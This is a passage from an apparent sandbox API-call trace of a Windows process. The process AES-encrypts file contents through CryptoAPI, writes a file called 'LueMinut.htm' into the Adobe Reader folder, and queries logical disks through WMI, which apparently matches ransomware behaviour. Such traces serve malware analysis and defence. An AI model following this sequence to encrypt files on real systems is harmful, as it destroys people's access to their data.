dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0182.405] GetFileType (hFile=0x320) returned 0x1 [0182.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0182.405] GetFileType (hFile=0x320) returned 0x1 [0182.405] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x434e [0182.406] ReadFile (in: hFile=0x320, lpBuffer=0x3988fd8, nNumberOfBytesToRead=0x434e, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x3988fd8*, lpNumberOfBytesRead=0x8f6eedc*=0x434e, lpOverlapped=0x0) returned 1 [0182.407] CloseHandle (hObject=0x320) returned 1 [0182.408] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0x66bb158) returned 1 [0182.408] CryptGenRandom (in: hProv=0x66bb158, dwLen=0x10, pbBuffer=0x398d67c | out: pbBuffer=0x398d67c) returned 1 [0183.072] CryptImportKey (in: hProv=0x66bb158, pbData=0x36a6ad4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f790) returned 1 [0183.072] CryptContextAddRef (hProv=0x66bb158, pdwReserved=0x0, dwFlags=0x0) returned 1 [0183.072] CryptContextAddRef (hProv=0x66bb158, pdwReserved=0x0, dwFlags=0x0) returned 1 [0183.072] CryptDuplicateKey (in: hKey=0xb7f790, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f890) returned 1 [0183.072] CryptContextAddRef (hProv=0x66bb158, pdwReserved=0x0, dwFlags=0x0) returned 1 [0183.072] CryptSetKeyParam (hKey=0xb7f890, dwParam=0x4, pbData=0x36a6bb4*=0x1, dwFlags=0x0) returned 1 [0183.072] CryptSetKeyParam (hKey=0xb7f890, dwParam=0x1, pbData=0x36a6b80, dwFlags=0x0) returned 1 [0183.072] CryptEncrypt (in: hKey=0xb7f890, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36a6bc4*, pdwDataLen=0x8f6eea8*=0x4350, dwBufLen=0x4350 | out: pbData=0x36a6bc4*, pdwDataLen=0x8f6eea8*=0x4350) returned 1 [0183.073] CryptEncrypt (in: hKey=0xb7f890, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36aaf38*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x36aaf38*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0183.074] CryptDestroyKey (hKey=0xb7f790) returned 1 [0183.074] CryptReleaseContext (hProv=0x66bb158, dwFlags=0x0) returned 1 [0183.074] CryptReleaseContext (hProv=0x66bb158, dwFlags=0x0) returned 1 [0183.074] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", lpFilePart=0x0) returned 0x35 [0183.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0183.075] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x59c [0183.205] GetFileType (hFile=0x59c) returned 0x1 [0183.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0183.205] GetFileType (hFile=0x59c) returned 0x1 [0183.205] WriteFile (in: hFile=0x59c, lpBuffer=0x36ab53c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x36ab53c*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0183.206] CloseHandle (hObject=0x59c) returned 1 [0183.206] CoTaskMemAlloc (cb=0x20c) returned 0x66cdfc8 [0183.206] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cdfc8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0183.206] CoTaskMemFree (pv=0x66cdfc8) [0183.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0183.207] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0183.207] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0183.207] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0183.207] IUnknown:Release (This=0xb51e34) returned 0x1 [0183.208] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027810) returned 0x0 [0183.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027810, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0183.209] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027810, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6031120) returned 0x0 [0183.209] WbemDefPath:IUnknown:Release (This=0x6027810) returned 0x0 [0183.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6031120) returned 0x0 [0183.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0183.209] WbemDefPath:IUnknown:AddRef (This=0x6031120) returned 0x3 [0183.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0183.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0183.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66ce368) returned 0x0 [0183.209] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce368, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0183.209] WbemDefPath:IUnknown:Release (This=0x66ce368) returned 0x3 [0183.209] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0183.209] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0183.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0183.209] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x2 [0183.209] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x1 [0183.209] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0183.209] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0183.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6031120) returned 0x0 [0183.209] WbemDefPath:IUnknown:AddRef (This=0x6031120) returned 0x3 [0183.209] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x2 [0183.209] WbemDefPath:IWbemPath:SetText (This=0x6031120, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0183.210] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0183.210] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0183.210] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0183.210] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0183.210] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0183.210] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0183.210] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0183.210] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0183.210] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0183.210] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0183.210] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0183.210] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0183.210] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0183.210] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0183.210] IUnknown:Release (This=0xb51e34) returned 0x1 [0183.211] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027830) returned 0x0 [0183.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027830, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0183.211] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027830, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6031190) returned 0x0 [0183.211] WbemDefPath:IUnknown:Release (This=0x6027830) returned 0x0 [0183.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6031190) returned 0x0 [0183.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0183.211] WbemDefPath:IUnknown:AddRef (This=0x6031190) returned 0x3 [0183.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0183.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0183.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66ce218) returned 0x0 [0183.211] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce218, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0183.211] WbemDefPath:IUnknown:Release (This=0x66ce218) returned 0x3 [0183.211] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0183.211] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0183.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0183.211] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x2 [0183.212] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x1 [0183.212] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0183.212] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0183.212] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6031190) returned 0x0 [0183.212] WbemDefPath:IUnknown:AddRef (This=0x6031190) returned 0x3 [0183.212] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x2 [0183.212] WbemDefPath:IWbemPath:SetText (This=0x6031190, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0183.212] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0183.212] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0183.212] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0183.212] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0183.212] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0183.212] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0183.212] IUnknown:Release (This=0xb51e34) returned 0x1 [0183.213] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x601f420) returned 0x0 [0183.213] WbemLocator:IUnknown:QueryInterface (in: This=0x601f420, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0183.213] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f420, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x60277f0) returned 0x0 [0183.213] WbemLocator:IUnknown:Release (This=0x601f420) returned 0x0 [0183.213] WbemLocator:IUnknown:QueryInterface (in: This=0x60277f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x60277f0) returned 0x0 [0183.213] WbemLocator:IUnknown:QueryInterface (in: This=0x60277f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0183.213] WbemLocator:IUnknown:AddRef (This=0x60277f0) returned 0x3 [0183.213] WbemLocator:IUnknown:QueryInterface (in: This=0x60277f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0183.213] WbemLocator:IUnknown:QueryInterface (in: This=0x60277f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0183.213] WbemLocator:IUnknown:QueryInterface (in: This=0x60277f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0183.213] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0183.213] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0183.213] WbemLocator:IUnknown:QueryInterface (in: This=0x60277f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0183.213] WbemLocator:IUnknown:Release (This=0x60277f0) returned 0x2 [0183.213] WbemLocator:IUnknown:Release (This=0x60277f0) returned 0x1 [0183.213] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0183.213] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0183.213] WbemLocator:IUnknown:QueryInterface (in: This=0x60277f0, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x60277f0) returned 0x0 [0183.214] WbemLocator:IUnknown:AddRef (This=0x60277f0) returned 0x3 [0183.214] WbemLocator:IUnknown:Release (This=0x60277f0) returned 0x2 [0183.214] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0183.214] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0183.214] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0183.214] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6027800) returned 0x0 [0183.214] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027800, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x603331c) returned 0x0 [0184.865] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5bd64) returned 0x0 [0184.865] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bd64, pProxy=0x603331c, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: 